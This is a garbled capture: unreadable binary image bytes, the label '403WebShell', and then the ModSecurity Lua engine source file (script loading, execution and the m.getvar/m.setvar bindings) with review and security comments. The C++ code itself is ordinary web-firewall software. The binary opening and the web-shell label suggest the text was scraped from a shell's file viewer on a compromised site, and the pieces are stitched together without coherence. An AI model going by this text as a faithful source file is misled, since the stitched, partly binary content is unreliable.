RIFF¤ WEBPVP8 ˜ ðÑ *ôô>‘HŸK¥¤"§£±¨àð �PNG  ��� IHDR���0���0����`n���� cHRM��z&��������������u0���`��:���p��Q<���bKGD�������������tIME� 6���� AIDATX��]pU����{��{�G�n$$@ -�-jВAک��P��1O���j��:cU|hg�}�C�ʋU�:�A A�����|$$$������}�^}8i *�د�?w�9gݵ��:{��F"��&��4� �@��@q_����Ow��9<<|�ԩ�;w���"�#GV�^}Ճ7�|s˖-{��|��G�-[��R�Q�aőTR)� �2!�e�63��X�U������{��Z�m۶�^}�5����}����v�퟇R��J�J,�$� B�$Ф")�i��D�9+䜆B.�qf�үÇoذaժU�i>��so����a^���۷����3�<�ꫯnݺ��"���\���gn0�h��B�i� hR��,W*�e�65��LS�ر�0ēO>���755���ι@O?��ҥK������:::����1��X�9S�%�'�I���$��Sg�ڥ3'zF/� ��Z�8ES6WZ#�. �\��P�R�2����-[�,_�|�`�j�Xl6M���b�Z�* �jҟ0��҉B""� y22r�ܹ�CG�;���{7nn��ma���������2S���� <��x�⡡�|p.Pw��x��y�C�=��O� ��CB}�ӵ����?�wq`8�e����{+Չɱ�\{&� LL������vww��]��?q��Y�������P(���vuu9���S?w���ݻ�v<���mш ��D�DR&�j�X�����y񪂬�>���dyg�7��b��s�p��E���BDR� t����������=w�\�[;:[&._�Dlڸv�]�� u�驚�/Y�a�����d�%��*)1� �V\G���[F]����X���i����J:z�N�9�?xϭ+X�V|���U�n� �g���hҜ�b�aҢ ^��j�f�ZV�K��w.�ؾp�}{� �/e��{O�o�����R�8���i� !jB`�3n;Mw.=7�S�'��F�y W��x�}LXNfz���� �b�p�b�bq~�����s�4�H�2��q^�r�� n���\aFf4�����n�c��Q�n�X�,����ӑҤd5DDDd 9'd��,�l��.���)?��������#}C�k����ܖq����m�a��y��8D���,K)�I�$I�8NE�aH)�|�VCDƘ��DF0D@M �"3�+�����Kcú��+n}��-�k:W�K������3ƄRʌ��m۞��q�9WJ���d�0�, �8��ٶ�⦈B�h���䩡�eDCj&$ �1�Y��\�>{~`�M����ͷt�#?VZ'@D²l"�,+�ɤc0�r��R*��X��n�_kMD�1"""ι�:%X��� $�b:i�b4 �X<�/"r�����[Vo��T��0V�i���sΓ$IG���4M�c �R�eq��QS�+5{�{�,��a"� �D�2�CҐ(I`CS�s�ʥ�R&�p�����۴(�N���e�sq�Ғ|%�����k�=�0S3@�`�i9�K��Պ�0T�Y��ؼD*��DE��2�gO�bŷrY����z�T��R�҉҆SX�Tϑ����/�Zi�eL��X��jdx䏿�eَ ���7��П"?�����0y����<��R�N8�\X9ӥx ��^�L�l�ކ��u����/���Q�B�^p�f��\3��]�INƑ�L�"--�r�! 8?���Rp~����v��|�M��$����_M �����GgF�/U�^�^p�Dk�ٲ�vM� ����L$�eGʓ01*���Two��f��#���ޱ��7��!5rdy"D��V���\ט�� [y�f ���@���Um����2w\�fg_򯯃z�y���v|`$_ow402�|���c��Zt��J��Yw��݌�b8+L����R�t߉O�xS���'�L��`/lY�� ���Z;f�nX���f��$�<���Ϩ�J��z"�y��%�qzz��(B��Y�@D�)�uS���<�\.[�����*T(�8v�̗����rrr2I�� N5w����^k=�}�:�S�yӌ��ً+�����NY碧f����0)��h. 
�R����4�Ա�>�X,:����c�0�0 �Rn6���mii�MW*�j��i�I�0�,ˊ��� È�8���j�$I �hkk �`||�B!b��l6�8Ncc��U��<���1f�&"FQdYV�B�b���j3�>� !��j>���g���g��RD����8���r�08�׵u�7��]3������~�,b�P���%tEXtdate:create�2025-02-07T10:02:54+00:00� t����%tEXtdate:modify�2025-02-07T10:02:54+00:00�P�6���(tEXtdate:timestamp�2025-02-07T10:02:54+00:00�E������IEND�B`� 403WebShell
/*
 * ModSecurity, http://www.modsecurity.org/
 * Copyright (c) 2015 - 2021 Trustwave Holdings, Inc. (http://www.trustwave.com/)
 *
 * You may not use this file except in compliance with
 * the License.  You may obtain a copy of the License at
 *
 *     http://www.apache.org/licenses/LICENSE-2.0
 *
 * If any of the files related to licensing are missing or if you have any
 * other questions related to licensing please contact Trustwave Holdings, Inc.
 * directly using the email address security@modsecurity.org.
 *
 */


#include "src/engine/lua.h"

#include <stdio.h>
#include <string.h>

#include <vector>
#include <string>
#include <algorithm>
#include <sstream>
#include <iterator>
#include <iostream>

#include "modsecurity/variable_value.h"
#include "modsecurity/modsecurity.h"
#include "src/utils/string.h"
#include "modsecurity/transaction.h"
#include "src/variables/variable.h"
#include "src/variables/highest_severity.h"
#include "src/actions/transformations/transformation.h"


namespace modsecurity {
namespace engine {


/*
 * Decides whether `script` can be used as a Lua rule script.
 *
 * Two conditions must hold: the path ends in ".lua" and `l->load()` manages
 * to load it. On failure a human-readable reason is written to `error` and
 * false is returned. When the build has no Lua support the function always
 * fails with a fixed message.
 *
 * The suffix test only looks at the file name; it says nothing about the
 * file's content. The actual validation is whatever load() performs.
 */
bool Lua::isCompatible(const std::string &script, Lua *l, std::string *error) {
#ifdef WITH_LUA
    static const char kSuffix[] = ".lua";
    const size_t suffixLen = sizeof(kSuffix) - 1;

    /* Guard the subtraction below: the name must be at least suffix-sized. */
    const bool endsWithLua = script.size() >= suffixLen
        && script.compare(script.size() - suffixLen, suffixLen, kSuffix) == 0;
    if (!endsWithLua) {
        *error = "Expecting a Lua script: " + script;
        return false;
    }

    std::string loadError;
    if (!l->load(script, &loadError)) {
        *error = "Problems load script: " + loadError;
        return false;
    }

    return true;
#else
    *error = "Lua support was not enabled.";
    return false;
#endif
}


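/*
 * Compiles the Lua file `script` and keeps the dumped chunk in m_blob.
 *
 * The file is compiled with luaL_loadfile() in a throw-away Lua state and
 * serialised with lua_dump() through Lua::blob_keeper. Nothing is executed
 * here. m_scriptName is updated even when compilation fails.
 *
 * @param script  path handed to luaL_loadfile().
 * @param err     receives a description of the failure.
 * @return true when the chunk was compiled and dumped, false otherwise.
 *
 * Security note: the dumped chunk is later fed back to lua_load() by run().
 * Lua does not check the consistency of binary chunks, so m_blob must only
 * ever hold what lua_dump() produced here from the operator's own script.
 */
bool Lua::load(const std::string &script, std::string *err) {
#ifdef WITH_LUA
    lua_State *L = luaL_newstate();
    if (L == NULL) {
        /* luaL_newstate() returns NULL when it cannot allocate the state;
         * using it below would dereference a null pointer. */
        err->assign("Failed to create a Lua state for script '" + script
            + "'.");
        return false;
    }
    luaL_openlibs(L);

    m_scriptName = script;

    /* Stage 1: compile. Stage 2 (dump) only runs when stage 1 succeeded. */
    bool failed = (luaL_loadfile(L, script.c_str()) != 0);
    if (!failed) {
#if defined (WITH_LUA_5_2) || defined (WITH_LUA_5_1)
        failed = (lua_dump(L, Lua::blob_keeper,
            reinterpret_cast<void *>(&m_blob)) != 0);
#else
        failed = (lua_dump(L, Lua::blob_keeper,
            reinterpret_cast<void *>(&m_blob), 0) != 0);
#endif
    }

    if (failed) {
        /* After a failed luaL_loadfile() the stack top is the error message.
         * lua_tostring() yields NULL when the top is not a string or number,
         * in which case only the generic text is reported. */
        const char *luaerr = lua_tostring(L, -1);
        /* NOTE(review): the message opens a quote before the script name and
         * never closes it; the text is left as is in case tests match it. */
        err->assign("Failed to compile script '" + script + "");
        if (luaerr) {
            err->append(": " + std::string(luaerr));
        }
        err->append(".");
        lua_close(L);

        return false;
    }

    lua_close(L);
    return true;
#else
    err->assign("Lua support was not enabled.");
    return false;
#endif
}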

#ifdef WITH_LUA
/*
 * Writer callback given to lua_dump(): forwards each piece of the dumped
 * chunk to the LuaScriptBlob passed as user data.
 *
 * Always returns 0. The result of LuaScriptBlob::write() is not inspected,
 * so a failed write would not be reported to lua_dump().
 */
int Lua::blob_keeper(lua_State *L, const void *p, size_t sz, void *ud) {
    static_cast<LuaScriptBlob *>(ud)->write(p, sz);
    return 0;
}


/*
 * Reader callback given to lua_load(): returns the next piece of the stored
 * chunk from the LuaScriptBlob passed as user data and stores its length in
 * `size`. Both values come straight from LuaScriptBlob::read().
 */
const char *Lua::blob_reader(lua_State *L, void *ud, size_t *size) {
    return static_cast<LuaScriptBlob *>(ud)->read(size);
}
#endif


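/*
 * Executes the chunk stored in m_blob for transaction `t`.
 *
 * A fresh Lua state is created per call. The table of mscLuaLib functions is
 * published as global "m", the transaction pointer as the light userdata
 * global "__transaction", and the chunk is loaded and run once so that it
 * can define main(). main() is then called with `str` as its only argument
 * (no argument when `str` is empty).
 *
 * @return true when main() returned a non-empty string (or number), false on
 *         any load/run error, when main() returned nothing usable, or when
 *         Lua support is not compiled in.
 *
 * Security notes:
 *  - luaL_openlibs() opens every standard library, so the script is not
 *    sandboxed in this function; it runs with the privileges of the hosting
 *    process. Treat rule scripts as trusted code.
 *  - lua_load() is called without a mode restriction and m_blob holds a
 *    dumped chunk. Lua does not check the consistency of binary chunks, so
 *    m_blob must only contain what load() produced.
 *  - "__transaction" is an ordinary global that the script can overwrite;
 *    the m.* callbacks are the place where that has to be checked.
 */
int Lua::run(Transaction *t, const std::string &str) {
#ifdef WITH_LUA
    std::string luaRet;
    const char *a = NULL;
    int ret = true;
    int rc = 0;
    lua_State *L = luaL_newstate();
    if (L == NULL) {
        /* Allocation failure: nothing to clean up, and every call below
         * would dereference a null state. */
        std::string e("Failed to execute lua script: " + m_scriptName
            + ". Unable to create a Lua state.");
        ms_dbg_a(t, 2, e);
        return false;
    }
    luaL_openlibs(L);

    /* Stack after these two calls: [metatable "luaL_msc", new table]. */
    luaL_newmetatable(L, "luaL_msc");
    lua_newtable(L);

    lua_pushlightuserdata(L, reinterpret_cast<void *>(t));
    lua_setglobal(L, "__transaction");

    /* Registers the m.* functions into the new table and pops it. */
    luaL_setfuncs(L, mscLuaLib, 0);
    lua_setglobal(L, "m");

#ifdef WITH_LUA_5_1
    rc = lua_load(L, Lua::blob_reader, &m_blob, m_scriptName.c_str());
#else
    rc = lua_load(L, Lua::blob_reader, &m_blob, m_scriptName.c_str(),
        NULL);
#endif
    if (rc != LUA_OK) {
        std::string e("Failed to execute lua script: " + m_scriptName + ". ");
        /* Append the category: assign() here would throw away the script
         * name that was just put into the message. */
        switch (rc) {
            case LUA_ERRSYNTAX:
                e.append("Syntax error. ");
                break;
            case LUA_ERRMEM:
                e.append("Memory error. ");
                break;
#if !defined(WITH_LUA_5_1) and !defined(WITH_LUA_5_4)
            case LUA_ERRGCMM:
                e.append("Garbage Collector error. ");
                break;
#endif
        }
        /* lua_tostring() may return NULL; std::string::append(NULL) is
         * undefined behaviour. */
        const char *luaerr = lua_tostring(L, -1);
        if (luaerr != NULL) {
            e.append(luaerr);
        }
        ms_dbg_a(t, 2, e);
        ret = false;
        goto err;
    }

    /* First execution of the chunk: defines main() and any globals. */
    if (lua_pcall(L, 0, 0, 0)) {
        std::string e("Failed to execute lua script: " + m_scriptName
            + " (before main)");
        const char *luaerr = lua_tostring(L, -1);
        if (luaerr != NULL) {
            e.append(" - ");
            e.append(luaerr);
        }
        ms_dbg_a(t, 2, e);

        ret = false;
        goto err;
    }

    /* The only value left on the stack is the "luaL_msc" metatable. */
    lua_setglobal(L, "modsec");

    lua_getglobal(L, "main");

    ms_dbg_a(t, 1, str);

    /* Put the parameter on the stack. */
    if (!str.empty()) {
        lua_pushlstring(L, str.c_str(), str.length());
    }

    if (lua_pcall(L, (str.empty() ? 0 : 1), 1, 0)) {
        std::string e("Failed to execute lua script: " + m_scriptName
            + " (main)");
        const char *luaerr = lua_tostring(L, -1);
        if (luaerr != NULL) {
            e.append(" - ");
            e.append(luaerr);
        }
        ms_dbg_a(t, 2, e);

        ret = false;
        goto err;
    }

    /* The single result of main(); NULL unless it is a string or number. */
    a = reinterpret_cast<const char *>(lua_tostring(L, -1));
    if (a != NULL) {
        luaRet.assign(a);
    }

    ms_dbg_a(t, 9, "Returning from lua script: " + luaRet);

    if (luaRet.empty()) {
        ret = false;
    }


err:
    /* Every path reaching here has exactly one value on the stack: the
     * error message or main()'s result. */
    lua_pop(L, 1);
    lua_close(L);

    return ret;
#else
    ms_dbg_a(t, 9, "Lua support was not enabled.");

    return false;
#endif
}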


#ifdef WITH_LUA
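/*
 * Lua binding m.log(level, text): writes `text` to the transaction's debug
 * log at `level`. Returns no values to Lua.
 *
 * Both arguments are validated with luaL_check*, which raise a Lua error on
 * a wrong type.
 */
int Lua::log(lua_State *L) {
    /* Retrieve parameters. */
    const int level = static_cast<int>(luaL_checknumber(L, 1));
    const char *text = luaL_checkstring(L, 2);

    /* Retrieve the transaction. "__transaction" is a plain global that the
     * script may have replaced; lua_topointer() would hand back the address
     * of a table, function or full userdata just as readily, so accept the
     * value only while it is still a light userdata. */
    lua_getglobal(L, "__transaction");
    const Transaction *t = NULL;
    if (lua_islightuserdata(L, -1)) {
        t = static_cast<const Transaction *>(lua_touserdata(L, -1));
    }

    /* Log message. */
    if (t != NULL) {
        ms_dbg_a(t, level, text);
    }

    return 0;
}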


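/*
 * Lua binding m.getvar(name [, transformations]): resolves one ModSecurity
 * variable, applies the optional transformation(s) given as argument 2 and
 * returns the resulting string.
 *
 * No value is returned (the caller sees nil) when the result is empty, so an
 * empty value and a missing variable look the same to the script.
 */
int Lua::getvar(lua_State *L) {
    /* Retrieve parameters. Raises a Lua error if argument 1 is no string. */
    const char *varname = luaL_checkstring(L, 1);

    /* "__transaction" is a plain global that the script can overwrite.
     * Only a light userdata can be the pointer run() installed; anything
     * else must not be cast to Transaction *. */
    lua_getglobal(L, "__transaction");
    Transaction *t = NULL;
    if (lua_islightuserdata(L, -1)) {
        t = static_cast<Transaction *>(lua_touserdata(L, -1));
    }
    if (t == NULL) {
        return 0;
    }

    std::string var = variables::Variable::stringMatchResolve(t, varname);
    /* With a single argument, stack index 2 is the "__transaction" value
     * pushed above; applyTransformations() returns its input unchanged for
     * userdata, so no transformation is applied in that case. */
    var = applyTransformations(L, t, 2, var);

    if (var.empty()) {
        /* Zero results: the call evaluates to nil on the Lua side. */
        return 0;
    }

    lua_pushlstring(L, var.c_str(), var.size());

    return 1;
}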


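/*
 * Lua binding m.getvars(name): resolves every variable matching `name` and
 * returns an array-like table whose entries are tables with the fields
 * "name" (key including the collection) and "value".
 *
 * The VariableValue objects filled in by stringMatchResolveMulti() are
 * deleted here once they have been copied into Lua strings.
 */
int Lua::getvars(lua_State *L) {
    /* Retrieve parameters. Raises a Lua error if argument 1 is no string. */
    const char *varname = luaL_checkstring(L, 1);

    /* "__transaction" is a plain global that the script can overwrite.
     * Only a light userdata can be the pointer run() installed; anything
     * else must not be cast to Transaction *. */
    lua_getglobal(L, "__transaction");
    Transaction *t = NULL;
    if (lua_islightuserdata(L, -1)) {
        t = static_cast<Transaction *>(lua_touserdata(L, -1));
    }

    lua_newtable(L);
    if (t == NULL) {
        /* No usable transaction: hand back the empty table. */
        return 1;
    }

    std::vector<const VariableValue *> l;
    variables::Variable::stringMatchResolveMulti(t, varname, &l);

    int idx = 1;
    for (const VariableValue *i : l) {
        /* Bind once instead of calling each getter twice. */
        const auto &key = i->getKeyWithCollection();
        const auto &value = i->getValue();

        lua_pushnumber(L, idx);
        lua_newtable(L);

        lua_pushstring(L, "name");
        lua_pushlstring(L, key.c_str(), key.size());
        lua_settable(L, -3);

        lua_pushstring(L, "value");
        lua_pushlstring(L, value.c_str(), value.size());
        lua_settable(L, -3);

        /* result[idx] = { name = ..., value = ... } */
        lua_settable(L, -3);
        idx++;
    }

    /* Lua holds its own copies of the strings by now. */
    for (const VariableValue *i : l) {
        delete i;
    }

    return 1;
}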


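/*
 * Lua binding m.setvar("collection.name", value): stores `value` under
 * `name` in one of the transaction collections TX, IP, GLOBAL, RESOURCE,
 * SESSION or USER (the collection part is matched case-insensitively).
 *
 * Returns no values to Lua. Problems with the arguments are written to the
 * debug log at level 8 and the call becomes a no-op.
 *
 * NOTE(review): the collection pointers are dereferenced without a null
 * check; whether they are always initialised is not visible from here.
 */
int Lua::setvar(lua_State *L) {
    const int nargs = lua_gettop(L);

    /* "__transaction" is a plain global that the script can overwrite.
     * Only a light userdata can be the pointer run() installed; anything
     * else must not be cast to Transaction *. */
    lua_getglobal(L, "__transaction");
    Transaction *t = NULL;
    if (lua_islightuserdata(L, -1)) {
        t = static_cast<Transaction *>(lua_touserdata(L, -1));
    }
    if (t == NULL) {
        return 0;
    }

    /* A lua_CFunction returns the number of results it pushed. A negative
     * value is not a valid count, so every failure path returns 0. */
    if (nargs != 2) {
        ms_dbg_a(t, 8,
            "m.setvar: Failed m.setvar funtion must has 2 arguments");
        return 0;
    }

    /* These raise a Lua error on a wrong type, so they run before any
     * std::string exists in this frame. The arguments are deliberately left
     * on the stack: the pointers are only valid while the values stay
     * there, and Lua discards the stack when the function returns. */
    const char *var_value = luaL_checkstring(L, 2);
    const char *var_name = luaL_checkstring(L, 1);

    const std::string vname(var_name);
    const size_t pos = vname.find(".");
    if (pos == std::string::npos) {
        ms_dbg_a(t, 8,
            "m.setvar: Must specify a collection using dot character" \
            " - ie m.setvar(tx.myvar,mydata)");
        return 0;
    }

    std::string collection(vname, 0, pos);
    collection = utils::string::toupper(collection);
    const std::string variableName(vname, pos + 1, std::string::npos);

    if (collection == "TX") {
        t->m_collections.m_tx_collection->storeOrUpdateFirst(
            variableName,
            var_value);
    } else if (collection == "IP") {
        t->m_collections.m_ip_collection->storeOrUpdateFirst(
            variableName, t->m_collections.m_ip_collection_key,
            t->m_rules->m_secWebAppId.m_value,
            var_value);
    } else if (collection == "GLOBAL") {
        t->m_collections.m_global_collection->storeOrUpdateFirst(
            variableName, t->m_collections.m_global_collection_key,
            t->m_rules->m_secWebAppId.m_value,
            var_value);
    } else if (collection == "RESOURCE") {
        t->m_collections.m_resource_collection->storeOrUpdateFirst(
            variableName, t->m_collections.m_resource_collection_key,
            t->m_rules->m_secWebAppId.m_value,
            var_value);
    } else if (collection == "SESSION") {
        t->m_collections.m_session_collection->storeOrUpdateFirst(
            variableName, t->m_collections.m_session_collection_key,
            t->m_rules->m_secWebAppId.m_value,
            var_value);
    } else if (collection == "USER") {
        t->m_collections.m_user_collection->storeOrUpdateFirst(
            variableName, t->m_collections.m_user_collection_key,
            t->m_rules->m_secWebAppId.m_value,
            var_value);
    } else {
        /* Previously dropped without a trace; make the typo visible. */
        ms_dbg_a(t, 8, "m.setvar: Unknown collection: " + collection);
    }
    return 0;
}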


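/*
 * Applies the transformation(s) found at stack index `idx` to `var`.
 *
 * The value at `idx` may be:
 *  - none, nil or userdata: `var` is returned unchanged;
 *  - a table: its array part is read in order, each entry naming a
 *    transformation; the name "none" resets the working value to `var`;
 *  - a string: a single transformation name.
 * Any other type is reported in the debug log and `var` is returned.
 *
 * Names are looked up as "t:<name>". Unknown names are logged at level 1
 * and skipped.
 *
 * @return the transformed value.
 */
std::string Lua::applyTransformations(lua_State *L, Transaction *t,
    int idx, std::string var) {
    std::string newVar = var;

    if (lua_isuserdata(L, idx) || lua_isnoneornil(L, idx)) {
        return var;
    }

    if (lua_istable(L, idx)) {
#ifdef WITH_LUA_5_1
        const int n = lua_objlen(L, idx);
#else
        const int n = lua_rawlen(L, idx);
#endif

        for (int i = 1; i <= n; i++) {
            lua_rawgeti(L, idx, i);
            /* NOTE(review): luaL_checkstring() raises a Lua error for a
             * non-string entry. When Lua is built as C that is a longjmp
             * past the std::string objects living in this frame. */
            const std::string name(luaL_checkstring(L, -1));
            /* Drop the element again. Without this every entry stays on the
             * stack, which is only guaranteed LUA_MINSTACK free slots, so a
             * long list would run past the space Lua reserved. */
            lua_pop(L, 1);

            /* A "none" means start over */
            if (name == "none") {
                newVar = var;
                continue;
            }

            actions::transformations::Transformation *tfn = \
                actions::transformations::Transformation::instantiate(
                    "t:" + name);
            // FIXME: transformation is not yet returning null.
            if (tfn) {
                newVar = tfn->evaluate(newVar, t);
            } else {
                ms_dbg_a(t, 1,
                    "SecRuleScript: Invalid transformation function: " \
                    + name);
            }
            delete tfn;
        }

        return newVar;
    }

    if (lua_isstring(L, idx)) {
        /* Cannot raise: lua_isstring() just confirmed string-or-number. */
        const std::string name(luaL_checkstring(L, idx));

        actions::transformations::Transformation *tfn = \
            actions::transformations::Transformation::instantiate(
                "t:" + name);

        // FIXME: transformation is not yet returning null.
        if (tfn) {
            newVar = tfn->evaluate(newVar, t);
        } else {
            ms_dbg_a(t, 1, "SecRuleScript: Invalid transformation function: " \
                + name);
        }
        delete tfn;
        return newVar;
    }

    /* lua_typename() expects a type code, not a stack index; passing `idx`
     * directly named whatever type happens to have that number. */
    const int type = lua_type(L, idx);
    ms_dbg_a(t, 8, "SecRuleScript: Transformation parameter must be a " \
        "transformation name or array of transformation names, but found " \
        "" + std::string(lua_typename(L, type)) + " (type " \
        + std::to_string(type) + ")");
    return newVar;
}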
#endif

}  //  namespace engine
}  //  namespace modsecurity

